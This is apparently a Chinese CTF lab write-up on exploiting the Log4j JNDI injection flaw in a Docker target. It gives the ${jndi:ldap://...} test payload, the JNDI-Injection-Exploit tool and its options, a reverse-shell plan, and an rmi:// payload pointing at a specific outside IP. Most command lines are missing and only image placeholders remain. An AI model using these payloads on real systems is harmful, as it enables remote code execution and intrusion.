type
Post
status
Published
date
slug
summary
tags
CTF
category
CTF-Knowledge
category (1)
icon
password
comment

环境准备

搭建docker服务
image-20231029204448313
image-20231029204448313
点问号,会发现传参方式是GET
image-20231029204537659
image-20231029204537659
先测试有没有log4j漏洞

测试漏洞

利用DNSlog验证漏洞存在

去dns平台获得一个dns
image-20231029205139684
image-20231029205139684
构造payload:${jndi:ldap://你的dns网址},进行传参
image-20231029205716002
image-20231029205716002
有dns解析记录,说明存在漏洞

漏洞利用

这里选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
下载JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,下载地址为https://github.com/bkfish/Apache-Log4j-Learning/tree/main 应用工具JNDI-Injection-Exploit搭建服务:
格式:
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。 接下来要实现反弹shell,可以用命令
注意“命令”必须经过编码,不然将无法实现
image-20231029205947722
image-20231029205947722
payload
设置监听端口
在vps中打开一个页面,监听我们的对应的端口。
image-20231029210526653
image-20231029210526653
image-20231029210548140
image-20231029210548140
替换payload rmi://111.229.162.217:1099/fb08m1
在这里插入图片描述
在这里插入图片描述
执行java命令和接受反弹shell的主机要是同一台
命令执行绕过之Linux通配符古剑山2023Miscwp
Loading...